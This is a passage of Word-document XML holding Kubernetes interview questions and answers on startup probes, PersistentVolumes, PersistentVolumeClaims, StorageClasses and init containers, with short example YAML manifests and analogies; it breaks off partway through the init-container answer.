        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use for slow-starting applications only</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Set higher thresholds for long boot times</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Keep probes lightweight (avoid heavy DB checks)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Combine with readiness + liveness probes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A startup probe in Kubernetes is a health check mechanism that verifies whether a container has successfully completed its initialization phase, delaying liveness and readiness checks until the application is fully started, and restarting the container if startup fails repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q281. What is persistent volume?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A PersistentVolume (PV) in Kubernetes is a cluster-level storage resource that provides durable storage independent of a Pod’s lifecycle.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A PersistentVolume is real storage that exists beyond Pod restarts, rescheduling, or deletion.</w:t>
        <w:br/>
        <w:t>Unlike container storage (which is temporary), PV ensures data persistence.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why PersistentVolume is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods are ephemeral (can be deleted anytime)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Local container storage is lost when Pod restarts</w:t>
        <w:br/>
        <w:t>So we need:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reliable storage that survives Pod lifecycle</w:t>
        <w:br/>
        <w:t>PV solves this problem.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (high level flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Admin creates a PersistentVolume (or it is dynamically provisioned)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. User creates a PersistentVolumeClaim (PVC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Kubernetes binds PVC to a suitable PV</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Pod mounts the PVC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Data is stored in external or persistent storage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PersistentVolume vs PersistentVolumeClaim</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PersistentVolume (PV)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Actual storage resource</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PersistentVolumeClaim (PVC)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Request for storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example PersistentVolume YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: PersistentVolume</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-pv</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  capacity:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    storage: 10Gi</w:t>
        <w:br/>
        <w:t xml:space="preserve">  accessModes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - ReadWriteOnce</w:t>
        <w:br/>
        <w:t xml:space="preserve">  persistentVolumeReclaimPolicy: Retain</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hostPath:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: /mnt/data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key fields</w:t>
        <w:br/>
        <w:t>1. capacity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Defines storage size (e.g., 10Gi, 100Gi)</w:t>
        <w:br/>
        <w:t>2. accessModes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReadWriteOnce (RWO)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReadOnlyMany (ROX)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReadWriteMany (RWX)</w:t>
        <w:br/>
        <w:t>3. reclaimPolicy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retain → keep data after PVC deletion</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Delete → remove storage automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recycle → scrub data (legacy)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Persistent Volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Local storage (hostPath)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cloud storage (EBS, Azure Disk, GCE PD)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Network storage (NFS, Ceph, GlusterFS)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Dynamic provisioning</w:t>
        <w:br/>
        <w:t>Instead of manually creating PVs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes creates PV automatically when PVC is created</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Uses StorageClass</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes like a hotel:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod = guest</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PV = permanent locker/storage room</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC = request form for locker</w:t>
        <w:br/>
        <w:t>Even if guest leaves, locker data remains.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PersistentVolume lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Available → not yet bound</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Bound → attached to PVC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Released → PVC deleted but data exists</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Failed → unusable state</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why PV is important</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data persistence across Pod restarts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stateful applications support (databases, logs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Decouples storage from application lifecycle</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A PersistentVolume in Kubernetes is a cluster-level storage resource that provides durable, independent storage that persists beyond the lifecycle of pods, allowing applications to store and retain data using a binding mechanism with PersistentVolumeClaims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q282. Explain persistent volume claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A PersistentVolumeClaim (PVC) in Kubernetes is a request made by a Pod (or user) for storage resources like size and access mode, without needing to know how the storage is actually provided.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A PVC is like a “storage request ticket” that asks for a PersistentVolume.</w:t>
        <w:br/>
        <w:t>It abstracts storage consumption from storage provisioning.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why PVC is needed</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods should not deal with storage details</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage can come from different backends (cloud, NFS, local)</w:t>
        <w:br/>
        <w:t>So:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Admin creates storage (PersistentVolume)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * User requests storage (PVC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes binds them automatically</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User creates a PVC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Kubernetes searches for matching PersistentVolume (PV)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. If match found → binding happens</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Pod uses PVC to mount storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Data persists beyond Pod lifecycle</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PVC vs PV</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PVC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PV</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Request storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Actual storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Created by</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Developer/User</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Admin / dynamic provisioning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Binding</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Consumes PV</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Gets bound to PVC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example PVC YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: PersistentVolumeClaim</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-pvc</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  accessModes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - ReadWriteOnce</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      storage: 5Gi</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key fields</w:t>
        <w:br/>
        <w:t>1. resources.requests.storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Amount of storage required</w:t>
        <w:br/>
        <w:t>2. accessModes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReadWriteOnce (RWO)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReadOnlyMany (ROX)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ReadWriteMany (RWX)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How PVC is used in a Pod</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t>- name: storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">  persistentVolumeClaim:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    claimName: my-pvc</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of binding</w:t>
        <w:br/>
        <w:t>1. Static provisioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PV created manually</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC binds to existing PV</w:t>
        <w:br/>
        <w:t>2. Dynamic provisioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC automatically creates PV using StorageClass</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens when PVC is deleted?</w:t>
        <w:br/>
        <w:t>Depends on PV reclaim policy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retain → data remains</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Delete → storage removed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recycle → cleaned and reused (deprecated)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a system like a storage warehouse:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PV = actual storage room</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC = customer request form</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes = warehouse manager matching requests to rooms</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC must be in same namespace as Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC binds to only one PV (1:1 mapping)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC ensures storage survives Pod restarts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why PVC is important</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enables stateful applications (databases, logs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Decouples storage from infrastructure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports portability across environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A PersistentVolumeClaim in Kubernetes is a namespace-scoped request for storage resources that allows pods to dynamically or statically bind to PersistentVolumes, enabling persistent and decoupled storage management independent of the pod lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q283. What is storage class?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A StorageClass in Kubernetes defines how storage should be dynamically provisioned and what type of storage should be created for PersistentVolumeClaims (PVCs).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>StorageClass is a blueprint that tells Kubernetes how to create storage automatically when a PVC requests it.</w:t>
        <w:br/>
        <w:t>It removes the need for manual PersistentVolume creation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why StorageClass is needed</w:t>
        <w:br/>
        <w:t>Without StorageClass:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Admin must manually create PersistentVolumes (PV)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not scalable in cloud environments</w:t>
        <w:br/>
        <w:t>With StorageClass:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC automatically creates PV</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage is provisioned on demand</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fully dynamic and cloud-native</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (flow)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User creates a PVC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. PVC references a StorageClass</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. StorageClass tells Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * what type of storage to create</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * which provisioner to use</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Kubernetes dynamically creates PV</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. PV gets bound to PVC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Pod mounts the storage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example StorageClass YAML</w:t>
        <w:br/>
        <w:t>apiVersion: storage.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: StorageClass</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: fast-storage</w:t>
        <w:br/>
        <w:t>provisioner: kubernetes.io/aws-ebs</w:t>
        <w:br/>
        <w:t>parameters:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type: gp3</w:t>
        <w:br/>
        <w:t>reclaimPolicy: Delete</w:t>
        <w:br/>
        <w:t>volumeBindingMode: WaitForFirstConsumer</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key fields</w:t>
        <w:br/>
        <w:t>1. provisioner</w:t>
        <w:br/>
        <w:t>Defines who creates the storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS EBS</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Azure Disk</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GCE Persistent Disk</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CSI drivers (modern approach)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. parameters</w:t>
        <w:br/>
        <w:t>Defines storage type/config:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SSD / HDD</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performance class (gp2, gp3)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IOPS settings</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. reclaimPolicy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Delete → storage removed when PVC is deleted</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retain → keeps data after PVC deletion</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. volumeBindingMode</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Immediate → PV created instantly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * WaitForFirstConsumer → waits until Pod is scheduled (better for zone awareness)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>StorageClass vs PV vs PVC</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Role</w:t>
        <w:br/>
        <w:tab/>
        <w:t>StorageClass</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Blueprint for storage creation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PersistentVolume</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Actual storage resource</w:t>
        <w:br/>
        <w:tab/>
        <w:t>PersistentVolumeClaim</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Request for storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of provisioning</w:t>
        <w:br/>
        <w:t>1. Static provisioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PV created manually</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC binds to existing PV</w:t>
        <w:br/>
        <w:t>2. Dynamic provisioning (StorageClass)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PV created automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No manual intervention</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a StorageClass like a menu in a restaurant:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * StorageClass = menu item (e.g., “SSD storage”)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PVC = order placed by customer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PV = actual meal prepared in kitchen</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cloud block storage (AWS EBS, Azure Disk)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High-performance SSD storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database storage (MySQL, PostgreSQL)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stateful applications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automation of storage provisioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cloud-native flexibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No manual PV management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Environment-specific storage types</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A StorageClass in Kubernetes is an API object that defines the provisioner, configuration, and policies used to dynamically create PersistentVolumes for PersistentVolumeClaims, enabling automated and scalable storage provisioning in a cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q284. Explain init containers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Init Containers in Kubernetes are special containers that run before the main application containers in a Pod and must complete successfully before the app starts.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Init containers are like “setup tasks” that prepare the environment before the main application runs.</w:t>
        <w:br/>
        <w:t>They run sequentially, one after another, and only once per Pod start.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why init containers are used</w:t>
        <w:br/>
        <w:t>They help handle pre-start dependencies, such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Waiting for a database to be ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Downloading configuration or code</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Setting up files or permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Running initialization scripts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Checking external services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How they work</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Pod starts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Init containers run in order</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Each init container must complete successfully</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. If any init container fails → Pod restarts (based on restart policy)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. After all init containers succeed → main containers start</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run before app containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run sequentially (not parallel)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Must finish successfully</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not restarted unless Pod restarts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  initContainers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: init-db-check</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: busybox</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command: ['sh', '-c', 'until nslookup db; do echo waiting for db; sleep 2; done']</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens here</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Init container waits for database DNS to resolve</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only after DB is reachable → main NGINX container starts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Multiple init containers</w:t>
        <w:br/>
        <w:t>You can have many init containers:</w:t>
        <w:br/>
        <w:t>initContainers:</w:t>
        <w:br/>
        <w:t>- name: init-1</w:t>
        <w:br/>
        <w:t>- name: init-2</w:t>
        <w:br/>
        <w:t>- name: init-3</w:t>
        <w:br/>
        <w:t>Execution order:</w:t>
        <w:br/>
        <w:t>init-1 → init-2 → init-3 → app container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Init containers vs app containers</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Init Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>App Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>When runs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Before app</w:t>
        <w:br/>
        <w:tab/>
        <w:t>After init completes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Must finish</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs continuously</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>On Pod restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Based on restartPolicy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup tasks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Main workload</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dependency checks (DB, API readiness)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Preloading data or configs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security setup (certs, secrets preparation)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * File system initialization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Migration scripts before app start</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Init containers = kitchen setup staff (cleaning, prepping ingredients)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * App container = chefs serving food</w:t>
        <w:br/>
        <w:t>Chefs cannot start until setup is complete.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run in the same Pod network and volume context</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Share volumes with app containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can use different images than main container</w:t>
        <w:br/>
